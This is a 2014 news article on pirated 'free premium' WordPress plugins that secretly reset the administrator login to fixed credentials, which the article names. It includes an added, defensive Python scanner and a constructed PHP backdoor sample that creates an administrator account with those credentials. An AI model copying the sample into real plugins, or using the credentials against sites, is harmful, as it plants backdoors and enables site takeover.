
Cybercrooks Hijacking WordPress Sites Through Malicious Free Premium Plugins

Posted: March 29, 2014

It is just about every day that hackers take to the internet to hijack or attack websites simply because they can. In one of the latest strings of website attacks, cybercriminals are targeting WordPress sites that run free "premium" plugins on the ever-so-popular and free content management software.

For years, WordPress has been a champion of open source blogging tools and content management system software. Its ease of use and its reliance on PHP and MySQL make WordPress an attractive choice for easily creating and maintaining a website or blog. To make WordPress sites even better and help them stand out among the millions of other web pages on the internet, there is a multitude of templates and plugins that can be used to spruce up the look of a site or add functionality. Unfortunately, it is the added functionality from various free premium plugins that has gained the attention of cybercrooks, who are attacking the sites that use them.

There are several sites that offer premium WordPress plugins at no cost, but some of those plugins include code that allows attackers to exploit the website running them, or to log in and gain unrestricted access to that specific site. Many of these supposedly free premium WordPress plugins are knock-off versions of other plugins that are sold for a price.

Security experts have found that these plagiarized free premium WordPress plugins were created by a hacker who looks to exploit a vulnerability that the plugin itself introduces once it is installed on a website. Many of these fake plugins offered as free premium plugins are able to reset the administrator access to the username "wordpress" and the password "gh67io9Cjm."

Some of these malicious plugins, recently identified as Restrict Content Pro WordPress Plugin V1.5.5, Ideas! v1.1.6, Ultimate Ajax Grid, User Profiles, and UberMenu – Flat Skin Pack V1.0.3, all contain malicious code from a specific user called "andrewp." On the site wplist.org, the researchers at Sucuri have found other users similar to "andrewp" who have uploaded rogue plugins in the past two months. So far these plugins have been identified as Go – Responsive Pricing & Compare Tables (go_pricing), FormCraft, Custom Scrollbar WordPress, Theia Sticky Sidebar and GravityForms.
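The behaviour described in the two paragraphs above (a plugin that silently resets the administrator login to a fixed username and password) leaves a recognisable trace in the plugin's PHP source. The scanner below is an added example for webmasters who want to check a downloaded plugin before activating it; it is not code from the article, from Sucuri, or from any of the plugins named. It looks for the exact credentials quoted in the article, for calls to the real WordPress user-management functions (`wp_create_user`, `wp_insert_user`, `wp_update_user`, `wp_set_password`) that pass literal strings, and for a file that both touches credentials and assigns the `administrator` role. The embedded `SAMPLE_PLUGIN` is a constructed snippet modelled on the described behaviour, not the source of any real plugin, and the rule names are this example's own.

```python
"""Heuristic scanner for WordPress plugin source that hard-codes admin credentials.

Added example: the indicators come from the article; the rule names and the
sample plugin text are constructed for illustration.
"""
import re
import sys
from pathlib import Path
from typing import Dict, List

# Credentials quoted in the article for the backdoored plugins.
KNOWN_BACKDOOR_USERNAME = "wordpress"
KNOWN_BACKDOOR_PASSWORD = "gh67io9Cjm"

# Real WordPress API functions that create users or change passwords.
# Legitimate plugins rarely call them with literal strings as arguments.
CREDENTIAL_FUNCTIONS = ("wp_create_user", "wp_insert_user", "wp_update_user", "wp_set_password")

# A credential function called with a quoted PHP string literal somewhere in its arguments.
_CALL_WITH_LITERAL = re.compile(
    r"\b(" + "|".join(CREDENTIAL_FUNCTIONS) + r")\s*\(.*?(['\"])[^'\"]+\2"
)
# An explicit administrator role assignment, e.g. 'role' => 'administrator'.
_ADMIN_ROLE = re.compile(r"['\"]role['\"]\s*=>\s*['\"]administrator['\"]")
# The backdoor username as a quoted literal.
_USERNAME_LITERAL = re.compile(r"['\"]" + re.escape(KNOWN_BACKDOOR_USERNAME) + r"['\"]")


def scan_source(source: str, origin: str = "<inline>") -> List[Dict[str, object]]:
    """Return one finding per suspicious line, plus a file-level finding when the
    file both calls a credential function and assigns the administrator role."""
    findings: List[Dict[str, object]] = []
    saw_cred_call = saw_admin_role = False

    def add(lineno: int, rule: str, text: str) -> None:
        findings.append({"file": origin, "line": lineno, "rule": rule, "text": text.strip()})

    for lineno, line in enumerate(source.splitlines(), start=1):
        cred_call = _CALL_WITH_LITERAL.search(line) is not None
        if KNOWN_BACKDOOR_PASSWORD in line:
            add(lineno, "known_backdoor_password", line)
        if cred_call and _USERNAME_LITERAL.search(line):
            add(lineno, "known_backdoor_username", line)
        if cred_call:
            saw_cred_call = True
            add(lineno, "credential_call_with_literal", line)
        if _ADMIN_ROLE.search(line):
            saw_admin_role = True
    if saw_cred_call and saw_admin_role:
        add(0, "creates_administrator", "credential function and administrator role in same file")
    return findings


def scan_plugin_dir(root: Path) -> List[Dict[str, object]]:
    """Scan every .php file under an unpacked plugin directory."""
    results: List[Dict[str, object]] = []
    for php in sorted(root.rglob("*.php")):
        results.extend(scan_source(php.read_text(errors="replace"), str(php)))
    return results


# Constructed sample modelled on the behaviour the article describes; not a real plugin.
SAMPLE_PLUGIN = """<?php
/*
Plugin Name: Constructed Sample Grid
*/
function csg_reset_admin() {
    $u = get_user_by('login', 'wordpress');
    if (!$u) {
        $id = wp_create_user('wordpress', 'gh67io9Cjm', 'admin@example.invalid');
        wp_update_user(array('ID' => $id, 'role' => 'administrator'));
    } else {
        wp_set_password('gh67io9Cjm', $u->ID);
    }
}
function csg_legit() {
    // ordinary plugin code that never touches credentials
    register_post_type('grid', array('public' => true));
}
"""


def scan_sample() -> List[Dict[str, object]]:
    """Run the scanner over the constructed sample (used for the self-check)."""
    return scan_source(SAMPLE_PLUGIN, "sample.php")


if __name__ == "__main__":
    # Usage: python scan_plugin.py /path/to/unpacked/plugin  (no argument scans the sample)
    hits = scan_plugin_dir(Path(sys.argv[1])) if len(sys.argv) > 1 else scan_sample()
    for h in hits:
        print(f"{h['file']}:{h['line']} [{h['rule']}] {h['text']}")
```

The scanner is deliberately line-based and conservative: a match on `known_backdoor_password` is a direct indicator, while `credential_call_with_literal` and `creates_administrator` are heuristics that deserve a manual look, since a legitimate onboarding plugin may also create users. It is a pre-installation check, not a substitute for reviewing the plugin or for comparing it against the vendor's retail release.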

Security researcher Denis Sinegubko from Unmask Parasites noted "Our conclusion is that this practice of posting plugins containing malicious code is typical for these sites. Moreover, when in their very own comments area people warn about malicious 'extras' they have found in the plugins, the admin readily replaces them with 'retail' versions."

For the most part, webmasters who seek free plugins for their WordPress sites use them because they do not want to spend extra money on added functions. In other cases it is a lack of experience that puts webmasters in a bind: they find a plugin they think is the right one, and the fact that it costs nothing seems like a bonus. Unfortunately, in these cases the webmaster ends up being attacked by the cybercrook who created the supposedly free premium WordPress plugin.
